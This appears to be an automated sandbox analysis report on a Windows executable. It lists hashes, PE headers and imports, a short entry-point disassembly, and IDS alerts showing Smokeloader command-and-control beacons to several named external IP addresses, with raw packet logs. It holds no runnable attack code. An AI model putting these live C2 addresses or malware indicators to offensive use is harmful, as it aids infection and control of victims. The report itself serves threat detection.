                  Process:C:\Windows\explorer.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.919008202366728
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:281600
                  MD5:28167cbfd672c0fc70358d19de3826eb
                  SHA1:92112f7c9a68e28d86c3762871525647f55bb337
                  SHA256:86533589ed7705b7bb28f85f19e45d9519023bcc53422f33d13b6023bab7ab21
                  SHA512:aa50669922c80477ee049a9c8ebe7f1d16be7aceaabdc4ca70889c53226a6759f04028d9aadd957aec9d4c13672a0a2e0f70a59425fa4d117b042fdb1b6a22df
                  SSDEEP:3072:SXrv1Mdy3HldT80jg8o5/8R2wwmPKI0qt4G7bKlizcTfmFkyMQM/h3qpZa9uD6Vq:Sz1sy3lXNqwK1qDYi4QrwVfquS
                  TLSH:1454D0B17292C8B1C0012170441ADFD16B7EED3555649A533BA82B6E6EB338C66FB31F
                  Icon Hash:8a9099a9ca8cd2f2
                  Entrypoint:0x4075d0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6141E99F [Wed Sep 15 12:39:59 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:0
                  File Version Major:5
                  File Version Minor:0
                  Subsystem Version Major:5
                  Subsystem Version Minor:0
                  Import Hash:d432ab96c0953f4be1f6b5eda702e7f0
                  Instruction
                  call 00007F30A0B862AFh
                  jmp 00007F30A0B808ADh
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  mov ecx, dword ptr [esp+04h]
                  test ecx, 00000003h
                  je 00007F30A0B80A56h
                  mov al, byte ptr [ecx]
                  add ecx, 01h
                  test al, al
                  je 00007F30A0B80A80h
                  test ecx, 00000003h
                  jne 00007F30A0B80A21h
                  add eax, 00000000h
                  lea esp, dword ptr [esp+00000000h]
                  lea esp, dword ptr [esp+00000000h]
                  mov eax, dword ptr [ecx]
                  mov edx, 7EFEFEFFh
                  add edx, eax
                  xor eax, FFFFFFFFh
                  xor eax, edx
                  add ecx, 04h
                  test eax, 81010100h
                  je 00007F30A0B80A1Ah
                  mov eax, dword ptr [ecx-04h]
                  test al, al
                  je 00007F30A0B80A64h
                  test ah, ah
                  je 00007F30A0B80A56h
                  test eax, 00FF0000h
                  je 00007F30A0B80A45h
                  test eax, FF000000h
                  je 00007F30A0B80A34h
                  jmp 00007F30A0B809FFh
                  lea eax, dword ptr [ecx-01h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  lea eax, dword ptr [ecx-02h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  lea eax, dword ptr [ecx-03h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  lea eax, dword ptr [ecx-04h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  sub esp, 20h
                  mov eax, dword ptr [ebp+08h]
                  push esi
                  push edi
                  push 00000008h
                  pop ecx
                  mov esi, 00401318h
                  lea edi, dword ptr [ebp-20h]
                  rep movsd
                  mov dword ptr [ebp-08h], eax
                  mov eax, dword ptr [ebp+0Ch]
                  pop edi
                  mov dword ptr [ebp-04h], eax
                  pop esi
                  test eax, eax
                  je 00007F30A0B80A3Eh
                  test byte ptr [eax], 00000008h
                  Programming Language:
                  • [ASM] VS2008 build 21022
                  • [ C ] VS2008 build 21022
                  • [C++] VS2008 build 21022
                  • [IMP] VS2005 build 50727
                  • [RES] VS2008 build 21022
                  • [LNK] VS2008 build 21022
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18774 | 0x3c | .text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x32000 | 0x15960 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x48000 | 0xe20 | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1220 | 0x1c | .text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5438 | 0x40 | .text
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1d8 | .text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x1823c | 0x18400 | False | 0.5811855670103093 | data | 6.667356950011295 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data | 0x1a000 | 0x173b8 | 0x14c00 | False | 0.7738493034638554 | data | 6.92663614417821 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x32000 | 0x15960 | 0x15a00 | False | 0.6664672145953757 | data | 6.760383698615715 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0x48000 | 0x1d9e | 0x1e00 | False | 0.40208333333333335 | data | 3.98004226626297 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country
                  KUNADOREHUMENANAMOVIZO | 0x45670 | 0x20ea | ASCII text, with very long lines (8426), with no line terminators | French | Switzerland
                  WOCIYIYAJETAFO | 0x44e98 | 0x7d1 | ASCII text, with very long lines (2001), with no line terminators | French | Switzerland
                  RT_ICON | 0x32660 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x33508 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x33db0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x34318 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x368c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x37968 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x382f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x387c0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x39668 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x39f10 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x3a5d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x3ab40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x3d0e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x3e190 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x3e660 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x3f508 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x3fdb0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x40478 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Georgian | Georgia
                  RT_ICON | 0x409e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x42f88 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x44030 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Georgian | Georgia
                  RT_ICON | 0x449b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Georgian | Georgia
                  RT_GROUP_ICON | 0x38758 | 0x68 | data | Georgian | Georgia
                  RT_GROUP_ICON | 0x3e5f8 | 0x68 | data | Georgian | Georgia
                  RT_GROUP_ICON | 0x44e20 | 0x76 | data | Georgian | Georgia
                  RT_VERSION | 0x47770 | 0x1ec | data | French | Switzerland
                  None | 0x47760 | 0xa | data | French | Switzerland
                  DLL | Import
                  KERNEL32.dll | MoveFileExA, IsBadHugeReadPtr, SetEndOfFile, FindResourceExW, GetConsoleAliasExesLengthA, GetConsoleAliasA, InterlockedDecrement, HeapFree, SetVolumeMountPointW, SetThreadExecutionState, GetSystemDefaultLCID, ConvertFiberToThread, WaitNamedPipeW, SetCommTimeouts, EnumResourceTypesA, GlobalAlloc, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, GetFileAttributesA, DnsHostnameToComputerNameW, GetFileAttributesW, SetTimeZoneInformation, WriteConsoleW, GetGeoInfoA, GetBinaryTypeW, LCMapStringA, GetCPInfoExW, TlsGetValue, GetLastError, GetProcAddress, VirtualAlloc, SetComputerNameA, GlobalGetAtomNameA, LoadLibraryA, WriteConsoleA, LocalAlloc, GetFileType, WritePrivateProfileStringA, CreateEventW, AddAtomA, FoldStringA, FindNextFileA, SetConsoleCursorInfo, GetModuleHandleA, FindFirstChangeNotificationA, CreateMutexA, FindNextFileW, VirtualProtect, GetFileAttributesExW, SetFileShortNameA, GetVersion, SetFileValidData, EnumCalendarInfoExA, SetFileAttributesW, IsBadStringPtrW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, HeapAlloc, GetModuleHandleW, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, DeleteCriticalSection, SetFilePointer, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, ReadFile, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, SetStdHandle, FlushFileBuffers, HeapSize, MultiByteToWideChar, GetLocaleInfoA, GetStringTypeA, GetStringTypeW, LCMapStringW, GetProcessHeap, GetConsoleOutputCP
                  ADVAPI32.dll | DeregisterEventSource
                  Language of compilation system | Country where language is spoken
                  French | Switzerland
                  Georgian | Georgia
                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  10/10/22-23:21:43.610588 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49727 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:40.937240 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49725 | 80 | 192.168.2.5 | 175.120.254.9
                  10/10/22-23:21:33.465965 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49719 | 80 | 192.168.2.5 | 211.171.233.126
                  10/10/22-23:21:16.044111 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49707 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:17.650942 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49708 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:20.622915 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49710 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:22.834033 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49712 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:27.468192 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49715 | 80 | 192.168.2.5 | 175.120.254.9
                  10/10/22-23:21:31.972645 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49718 | 80 | 192.168.2.5 | 175.120.254.9
                  10/10/22-23:20:42.553354 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49696 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:20:43.995908 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49697 | 80 | 192.168.2.5 | 195.158.3.162
                  10/10/22-23:20:48.233145 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49701 | 80 | 192.168.2.5 | 211.171.233.126
                  10/10/22-23:21:14.135349 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49706 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:36.299575 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49721 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:20:44.841478 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49698 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:20:46.940023 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49700 | 80 | 192.168.2.5 | 211.171.233.126
                  10/10/22-23:20:51.020309 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49703 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:13.333100 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49705 | 80 | 192.168.2.5 | 185.95.186.58
                  10/10/22-23:21:40.109589 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49724 | 80 | 192.168.2.5 | 195.158.3.162
                  10/10/22-23:20:45.875779 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49699 | 80 | 192.168.2.5 | 195.158.3.162
                  10/10/22-23:21:42.125679 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49726 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:35.785955 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49720 | 80 | 192.168.2.5 | 109.102.255.230
                  10/10/22-23:21:46.586226 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49729 | 80 | 192.168.2.5 | 175.120.254.9
                  10/10/22-23:20:49.530167 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49702 | 80 | 192.168.2.5 | 175.120.254.9
                  10/10/22-23:21:49.526122 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49731 | 80 | 192.168.2.5 | 185.95.186.58
                  10/10/22-23:21:17.650942 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49708 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:22.834033 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49712 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:20:46.940023 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49700 | 80 | 192.168.2.5 | 211.171.233.126
                  10/10/22-23:20:49.530167 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49702 | 80 | 192.168.2.5 | 175.120.254.9
                  10/10/22-23:21:30.478796 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49717 | 80 | 192.168.2.5 | 175.120.254.9
                  10/10/22-23:21:45.102166 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49728 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:20:40.724773 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49695 | 80 | 192.168.2.5 | 175.120.254.9
                  10/10/22-23:21:38.968161 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49723 | 80 | 192.168.2.5 | 211.171.233.129
                  10/10/22-23:21:49.526122 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49731 | 80 | 192.168.2.5 | 185.95.186.58
                  10/10/22-23:21:24.328396 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49713 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:28.975450 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49716 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:40.937240 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49725 | 80 | 192.168.2.5 | 175.120.254.9
                  10/10/22-23:21:36.299575 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49721 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:19.131381 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49709 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:37.493453 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49722 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:26.167962 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49714 | 80 | 192.168.2.5 | 211.171.233.129
                  10/10/22-23:20:43.995908 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49697 | 80 | 192.168.2.5 | 195.158.3.162
                  10/10/22-23:20:51.020309 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 | 49703 | 80 | 192.168.2.5 | 123.213.233.194
                  10/10/22-23:21:20.622915 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49710 | 80 | 192.168.2.5 | 123.213.233.194
                  Oct 10, 2022 23:20:50.714776039 CEST8049702175.120.254.9192.168.2.5
                  Oct 10, 2022 23:20:50.714844942 CEST8049702175.120.254.9192.168.2.5
                  Oct 10, 2022 23:20:50.714965105 CEST4970280192.168.2.5175.120.254.9
                  Oct 10, 2022 23:20:50.720427036 CEST4970280192.168.2.5175.120.254.9
                  Oct 10, 2022 23:20:50.752458096 CEST4970380192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:50.989531040 CEST8049702175.120.254.9192.168.2.5
                  Oct 10, 2022 23:20:51.019989014 CEST8049703123.213.233.194192.168.2.5
                  Oct 10, 2022 23:20:51.020308971 CEST4970380192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:51.020308971 CEST4970380192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:51.020308971 CEST4970380192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:51.287748098 CEST8049703123.213.233.194192.168.2.5
                  Oct 10, 2022 23:20:51.911545992 CEST8049703123.213.233.194192.168.2.5
                  Oct 10, 2022 23:20:51.911607981 CEST8049703123.213.233.194192.168.2.5
                  Oct 10, 2022 23:20:51.911722898 CEST4970380192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:51.911722898 CEST4970380192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:51.927686930 CEST4970480192.168.2.5213.227.155.16
                  Oct 10, 2022 23:20:52.179060936 CEST8049703123.213.233.194192.168.2.5
                  Oct 10, 2022 23:20:54.933856010 CEST4970480192.168.2.5213.227.155.16
                  Oct 10, 2022 23:21:00.996983051 CEST4970480192.168.2.5213.227.155.16
                  Oct 10, 2022 23:21:13.246186972 CEST4970580192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:13.332807064 CEST8049705185.95.186.58192.168.2.5
                  Oct 10, 2022 23:21:13.332993984 CEST4970580192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:13.333100080 CEST4970580192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:13.333100080 CEST4970580192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:13.420260906 CEST8049705185.95.186.58192.168.2.5
                  Oct 10, 2022 23:21:13.709359884 CEST8049705185.95.186.58192.168.2.5
                  Oct 10, 2022 23:21:13.709392071 CEST8049705185.95.186.58192.168.2.5
                  Oct 10, 2022 23:21:13.709489107 CEST4970580192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:13.711112022 CEST4970580192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:13.798221111 CEST8049705185.95.186.58192.168.2.5
                  Oct 10, 2022 23:21:13.873567104 CEST4970680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:14.135059118 CEST8049706123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:14.135209084 CEST4970680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:14.135349035 CEST4970680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:14.135376930 CEST4970680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:14.396673918 CEST8049706123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:15.289622068 CEST8049706123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:15.289669037 CEST8049706123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:15.289820910 CEST4970680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:15.653580904 CEST4970680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:15.754513979 CEST4970780192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:15.914838076 CEST8049706123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:16.018649101 CEST8049707123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:16.018809080 CEST4970780192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:16.044111013 CEST4970780192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:16.044157028 CEST4970780192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:16.308129072 CEST8049707123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:17.202096939 CEST8049707123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:17.202136993 CEST8049707123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:17.202325106 CEST4970780192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:17.278944016 CEST4970780192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:17.380759954 CEST4970880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:17.542870045 CEST8049707123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:17.641982079 CEST8049708123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:17.642219067 CEST4970880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:17.650942087 CEST4970880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:17.651125908 CEST4970880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:17.912110090 CEST8049708123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:18.822432041 CEST8049708123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:18.822467089 CEST8049708123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:18.822736025 CEST4970880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:18.822858095 CEST4970880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:18.859714031 CEST4970980192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:19.084141016 CEST8049708123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:19.131140947 CEST8049709123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:19.131282091 CEST4970980192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:19.131381035 CEST4970980192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:19.135519981 CEST4970980192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:19.406131029 CEST8049709123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:20.325900078 CEST8049709123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:20.325957060 CEST8049709123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:20.326036930 CEST4970980192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:20.326036930 CEST4970980192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:20.354178905 CEST4971080192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:20.596750975 CEST8049709123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:20.622606039 CEST8049710123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:20.622914076 CEST4971080192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:20.622915030 CEST4971080192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:20.622915030 CEST4971080192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:20.891582966 CEST8049710123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:21.793978930 CEST8049710123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:21.794029951 CEST8049710123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:21.794250965 CEST4971080192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:21.794333935 CEST4971080192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:21.829883099 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:21.829952002 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:21.830020905 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:21.831485033 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:21.831512928 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.055593014 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.055783987 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.063002110 CEST8049710123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:22.063193083 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.063225985 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.063570976 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.087110996 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.087174892 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.475008011 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.475177050 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.475177050 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.475241899 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.475274086 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.530076027 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.539927959 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.539957047 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.540065050 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.540103912 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.540136099 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.540138960 CEST4434971187.250.250.50192.168.2.5
                  Oct 10, 2022 23:21:22.540200949 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.540369987 CEST49711443192.168.2.587.250.250.50
                  Oct 10, 2022 23:21:22.540400982 CEST4434971187.250.250.50192.168.2.5
